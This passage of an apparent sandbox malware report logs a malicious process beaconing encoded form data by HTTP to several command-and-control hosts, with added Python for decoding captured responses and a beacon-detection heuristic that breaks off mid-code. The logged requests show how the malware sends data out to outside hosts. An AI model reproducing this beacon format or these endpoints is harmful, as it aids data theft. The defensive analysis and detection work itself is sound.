                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      28 | 192.168.2.4 | 50030 | 118.107.250.103 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:37.241071939 CET | 485 | OUT | GET /gxyh/?xP7x=xivIugper8hSVuoO04uKuRFsECiR4QMGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT+8RMEQc9vH5Jgj7hQnpQkzk/1bmr1+yLEUs8=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:38.111676931 CET | 266 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 08 Jan 2025 15:13:07 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0
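The zxyck.net replies are shown only as a "Data Raw" hex dump and a lossy "Data Ascii" rendering, and the first two (sessions 27 and 28's POST reply above, and the response at the top of this section) are additionally gzip-compressed inside HTTP/1.1 chunked framing. The following is an added example, not code from the report or from Joe Sandbox: it strips the chunked framing, gunzips where the response carried Content-Encoding: gzip, and checks the gzip trailer's ISIZE field. Both hex strings are copied verbatim from the Data Raw lines above. Run, it shows that the compressed reply decodes to the same 28-byte string, /www/wwwroot/zxyck.net/gxyh., that the server returned uncompressed to the GET in session 28.

```python
"""Decode the chunked (and, for the POST reply, gzip-compressed) response bodies
that the report shows only as 'Data Raw' hex.  Added example, not code from the
report or from Joe Sandbox; both hex strings are copied from the report."""
import gzip

# Reply to the POST in session 27: Transfer-Encoding: chunked, Content-Encoding: gzip.
GZIP_CHUNKED_HEX = (
    "32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc "
    "12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 "
    "00 00 0d 0a 30 0d 0a 0d 0a"
)
# Reply to the GET in session 28: Transfer-Encoding: chunked, no Content-Encoding.
PLAIN_CHUNKED_HEX = (
    "31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e "
    "65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: repeated '<hex-size>\\r\\n<chunk>\\r\\n',
    terminated by a zero-size chunk.  Any trailer section after it is ignored."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF after chunk data")
        out += chunk
        pos += size + 2


def gzip_isize(member: bytes) -> int:
    """ISIZE from the gzip trailer: the declared uncompressed length mod 2**32."""
    return int.from_bytes(member[-4:], "little")


def decode_body(hex_dump: str, content_encoding: str = "") -> bytes:
    """Turn a report 'Data Raw' hex dump of a chunked body into the plaintext body."""
    body = dechunk(bytes.fromhex(hex_dump))   # fromhex ignores the spaces
    if content_encoding.lower() == "gzip":
        body = gzip.decompress(body)          # also verifies the CRC32/ISIZE trailer
    return body


if __name__ == "__main__":
    gz_member = dechunk(bytes.fromhex(GZIP_CHUNKED_HEX))
    print("gzip trailer ISIZE:", gzip_isize(gz_member))
    print("POST reply:", decode_body(GZIP_CHUNKED_HEX, "gzip"))
    print("GET reply: ", decode_body(PLAIN_CHUNKED_HEX))
```

The chunk-size line of the plain reply is 1c, i.e. 28 bytes, and the gzip trailer of the compressed reply declares the same 28-byte length, which is a cheap consistency check before trusting a decode of captured traffic.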


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      29 | 192.168.2.4 | 50031 | 209.74.77.109 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:43.174268961 CET | 761 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 36 2b 43 30 71 4f 66 57 67 52 39 32 4e 6f 6c 52 77 4c 4a 6e 4f 47 67 4f 4c 31 61 77 55 6d 69 51 6f 77 3d 3d
                                                                      Data Ascii: xP7x=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6+C0qOfWgR92NolRwLJnOGgOL1awUmiQow==
                                                                      Jan 8, 2025 16:14:43.772525072 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:43 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      30 | 192.168.2.4 | 50032 | 209.74.77.109 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:45.727068901 CET | 781 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 45 39 57 79 54 45 5a 6c 66 5a 7a 77 30 4f 65 54 33 31 5a 6b 57 39 4c 76 4f 54 72 36 51 4b 4a 58 63 3d
                                                                      Data Ascii: xP7x=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGE9WyTEZlfZzw0OeT31ZkW9LvOTr6QKJXc=
                                                                      Jan 8, 2025 16:14:46.301549911 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:46 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      31 | 192.168.2.4 | 50033 | 209.74.77.109 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:48.268421888 CET | 10863 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 67 56 55 4d 50 4e 55 7a 70 46 72 66 57 45 45 56 68 69 75 66 53 37 66 34 7a 6b 77 4f 79 32 70 4a 6d 4b 2b 50 64 72 2b 38 4c 4d 54 52 33 68 39 2b 69 62 45 66 57 54 75 4c 64 31 32 6a 38 6f 34 50 54 65 75 6c 59 57 58 33 67 69 48 41 6f 79 47 71 61 4d 48 66 33 6c 6b 73 70 77 2b 41 33 55 4d 2b 59 55 50 68 53 59 69 46 4e 73 46 38 34 73 68 74 76 6c 32 37 4f 49 71 45 31 65 4b 41 6a 6b 67 6d 76 4c 56 58 73 59 2f 6e 4a 47 6a 63 7a 35 4c 6a 59 46 75 4c 31 70 2b 74 45 77 36 34 30 77 4a 62 50 34 4b 77 [TRUNCATED]
                                                                      Data Ascii: xP7x=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanNPr+3bARmxxrX2Ti7cUCZD92DbKC7VlLvAhvy+86QDwMB2BUWqohmtmNh2ddDwlFkZH22PIMu4iVTqv6eLmEuPooZyHBJm9qlTv/Fv8A7rUdwijYtR3g7+gNnvs8LjugVUMPNUzpFrfWEEVhiufS7f4zkwOy2pJmK+Pdr+8LMTR3h9+ibEfWTuLd12j8o4PTeulYWX3giHAoyGqaMHf3lkspw+A3UM+YUPhSYiFNsF84shtvl27OIqE1eKAjkgmvLVXsY/nJGjcz5LjYFuL1p+tEw640wJbP4Kw [TRUNCATED]
                                                                      Jan 8, 2025 16:14:48.865330935 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:48 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      32 | 192.168.2.4 | 50034 | 209.74.77.109 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:50.809536934 CET | 490 | OUT | GET /n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:51.423418045 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:51 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      33 | 192.168.2.4 | 50035 | 188.114.96.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:56.479806900 CET | 770 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 42 59 34 65 79 48 39 41 2f 4e 6e 36 32 38 4e 59 5a 45 70 33 4d 69 51 57 2f 6b 54 4f 47 6f 43 44 6d 41 3d 3d
                                                                      Data Ascii: xP7x=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWBY4eyH9A/Nn628NYZEp3MiQW/kTOGoCDmA==
                                                                      Jan 8, 2025 16:14:57.187223911 CET | 1075 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:57 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:14:57 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZWXZpUTestMV0qYYHE2M0J39ZNIz1J1MJ%2BNiLJz5QiPi6KE8pIw%2F96t3LYm3rUP9h2kkFGuoLF7aZaoYNmpm69I6NlUikaorJKRw%2Fou0vg%2BVskHH3HE2muhRthvdtOzr1cIG5JFS28%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed23e17e190f70-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: f70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
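Across sessions 27 to 33 above the same request shape recurs against three unrelated hosts (www.zxyck.net, www.dailyfuns.info, www.mydreamdeal.click): a POST to a short single-segment path (/gxyh/, /n9b0/, /1ag2/) carrying one base64-like form field, with Origin and Referer pointing back at that same path and Cache-Control: no-cache, followed by a GET to the same path whose query repeats that field name plus a short second token (F4=Q0yHy), every request using a Windows Phone User-Agent (WPDesktop; Lumia 521) from a desktop process and Connection: close, and the POST bodies to each host having the same three lengths (201, 221 and 10301 bytes). The following is an added example, not code from the report or from Joe Sandbox, that turns those observations into a per-request indicator score plus a cross-request correlation on the shared field name. The two beacon requests are copied from sessions 27 and 28 with the long bodies shortened; the /login request is a constructed benign control; the path-length range in SHORT_PATH and the score threshold are assumptions to tune on real traffic.

```python
"""Heuristic scoring of the HTTP beacon shape seen in the sessions above.
Added example, not part of the Joe Sandbox report; the two beacon requests are
copied from sessions 27 and 28 (bodies shortened), the /login request is a
constructed benign control."""
import re
from urllib.parse import urlsplit

B64ISH = re.compile(r"^[A-Za-z0-9+/]+=*$")
# /gxyh/, /n9b0/, /1ag2/ in the report; the 3-8 length range is an assumption.
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,8}/$")
UA_PHONE_TOKENS = ("WPDesktop", "Lumia")   # taken from the observed User-Agent
THRESHOLD = 4                              # assumption, tune on real traffic

POST_BEACON = """POST /gxyh/ HTTP/1.1
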